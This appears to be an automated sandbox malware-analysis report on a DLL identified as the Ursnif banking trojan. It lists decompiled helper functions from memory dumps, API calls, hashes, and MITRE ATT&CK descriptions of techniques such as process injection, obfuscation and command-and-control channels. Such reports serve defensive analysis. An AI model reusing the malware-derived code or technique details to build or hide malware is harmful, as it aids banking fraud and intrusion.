Instruction Fuzzy Hash: 6F816A71E0061DEFDB51DF68CC50BAEB7B4BF46384F008199E959A7242EB348985DF21

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE2270, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 128COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(000008C6,6DE1D058), ref: 6DDE2345

Strings

sto, xrefs: 6DDE2361
surfa, xrefs: 6DDE2377

Memory Dump Source

Source File: 00000003.00000002.500576744.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: CurrentDirectory
String ID: sto$surfa
API String ID: 1611563598-1510663320
Opcode ID: cdaa4dfe0ff4b35f935f02d31d4e4c137aae4e36f09b1ce54d46b12eb734b79d
Instruction ID: bc9b2156397abcbb7e6fe1a5462479b7161c8f6942de7797ea8e25372ce81c4c
Opcode Fuzzy Hash: cdaa4dfe0ff4b35f935f02d31d4e4c137aae4e36f09b1ce54d46b12eb734b79d
Instruction Fuzzy Hash: 47511AB4F0020ADBCB08DF68C982B6C77F9FB8B309B10815AE43597355E7349A55EB54

Uniqueness

Uniqueness Score: -1.00%

Function 02A75AF1, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E02A75AF1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E02A7A71F(_t2);
				if(_t34 != 0) {
					_t30 = E02A7A71F(_t28);
					if(_t30 == 0) {
						E02A7A734(_t34);
					} else {
						_t39 = _a4;
						_t22 = E02A7A782(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E02A7A782(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x02a75af1
0x02a75afb
0x02a75afd
0x02a75b03
0x02a75b03
0x02a75b0c
0x02a75b10
0x02a75b1c
0x02a75b20
0x02a75b94
0x02a75b22
0x02a75b22
0x02a75b26
0x02a75b2b
0x02a75b30
0x02a75b4a
0x02a75b39
0x02a75b39
0x02a75b3d
0x02a75b40
0x02a75b45
0x02a75b45
0x02a75b4f
0x02a75b77
0x02a75b7d
0x02a75b80
0x02a75b51
0x02a75b53
0x02a75b5b
0x02a75b66
0x02a75b6b
0x02a75b6b
0x02a75b87
0x02a75b8e
0x02a75b8f
0x02a75b8f
0x02a75b20
0x02a75b9f

APIs

lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,02A73E08,?,?,?,?,00000102,02A767B8,?,?,00000000), ref: 02A75AFD

Part of subcall function 02A7A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02A75595), ref: 02A7A72B

Part of subcall function 02A7A782: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,02A75B2B,00000000,00000001,00000001,?,?,02A73E08,?,?,?,?,00000102), ref: 02A7A790
Part of subcall function 02A7A782: StrChrA.SHLWAPI(?,0000003F,?,?,02A73E08,?,?,?,?,00000102,02A767B8,?,?,00000000,00000000), ref: 02A7A79A

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02A73E08,?,?,?,?,00000102,02A767B8,?), ref: 02A75B5B
lstrcpy.KERNEL32(00000000,00000000), ref: 02A75B6B
lstrcpy.KERNEL32(00000000,00000000), ref: 02A75B77

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 8f5b35bfee01830ea96066c6ce5824a5d50a3c0ddbdb1d42203e29e3087821e2
Instruction ID: 0a280277d0b8c535076edb4803e559bd21f5d986baa246286df4bfd3dc29110d
Opcode Fuzzy Hash: 8f5b35bfee01830ea96066c6ce5824a5d50a3c0ddbdb1d42203e29e3087821e2
Instruction Fuzzy Hash: 892190B6904259FBCB125F74CC94AAEBFBAAF46294B444055FE059B201EF30C9018BE4

Uniqueness

Uniqueness Score: -1.00%

Function 02A745C6, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02A745C6(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E02A7A71F(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x02a745db
0x02a745df
0x02a745e9
0x02a745ee
0x02a745f3
0x02a745f5
0x02a745fd
0x02a74602
0x02a74610
0x02a74615
0x02a7461f

APIs

lstrlenW.KERNEL32(004F0053,?,75145520,00000008,04D1935C,?,02A78D93,004F0053,04D1935C,?,?,?,?,?,?,02A7523E), ref: 02A745D6
lstrlenW.KERNEL32(02A78D93,?,02A78D93,004F0053,04D1935C,?,?,?,?,?,?,02A7523E), ref: 02A745DD

Part of subcall function 02A7A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02A75595), ref: 02A7A72B

memcpy.NTDLL(00000000,004F0053,751469A0,?,?,02A78D93,004F0053,04D1935C,?,?,?,?,?,?,02A7523E), ref: 02A745FD
memcpy.NTDLL(751469A0,02A78D93,00000002,00000000,004F0053,751469A0,?,?,02A78D93,004F0053,04D1935C), ref: 02A74610

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 89ea9424385bca0826ed0c0f3648ced28db5fad4b62d7e4a1a1e29f37f558871
Instruction ID: 3d1c132fe49fc74ff29686f9768cc54479035059183581ff443a8ad2e5582bf8
Opcode Fuzzy Hash: 89ea9424385bca0826ed0c0f3648ced28db5fad4b62d7e4a1a1e29f37f558871
Instruction Fuzzy Hash: 18F0F976900119BBCF11EFA9CC84C9FBBADEF493647154462EA04D7201EB31EA159BE4

Uniqueness

Uniqueness Score: -1.00%

Function 02A7361A, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(04D19A48,00000000,00000000,74ECC740,02A720ED,00000000), ref: 02A7362A
lstrlen.KERNEL32(?), ref: 02A73632

Part of subcall function 02A7A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02A75595), ref: 02A7A72B

lstrcpy.KERNEL32(00000000,04D19A48), ref: 02A73646
lstrcat.KERNEL32(00000000,?), ref: 02A73651

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: e26a625ed09a4be3b9a7eae6450b929c794a7904dc40574c5595f6fd67d4a1bc
Instruction ID: e4a978f5f14a739f8d0e837f35b409c203cd67fe4ff7ad8042f514b30baf83cf
Opcode Fuzzy Hash: e26a625ed09a4be3b9a7eae6450b929c794a7904dc40574c5595f6fd67d4a1bc
Instruction Fuzzy Hash: 5EE09233901621A78711ABE4AC48C5FBBAEEF89761704082BF700D3100CF31C91B8BE9

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 5.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Function 6DDC1ADA, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 6DDC1996, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 6DDC1BAC, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Function 6DDC1A44, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 6DDC1456, Relevance: 15.1, APIs: 10, Instructions: 98
threadsleepsynchronizationCOMMON

Function 6DDC1146, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 6DDC1D4B, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Function 6DDC155C, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Function 6DDC1717, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111
memoryCOMMON

Function 6DDC15EA, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Function 6DDC1020, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Function 6DDC1E55, Relevance: 3.1, APIs: 2, Instructions: 59
stringthreadCOMMON

Function 6DDC16F1, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Function 6DDC1634, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Function 6DDC1F0E, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Function 6DDC23A5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON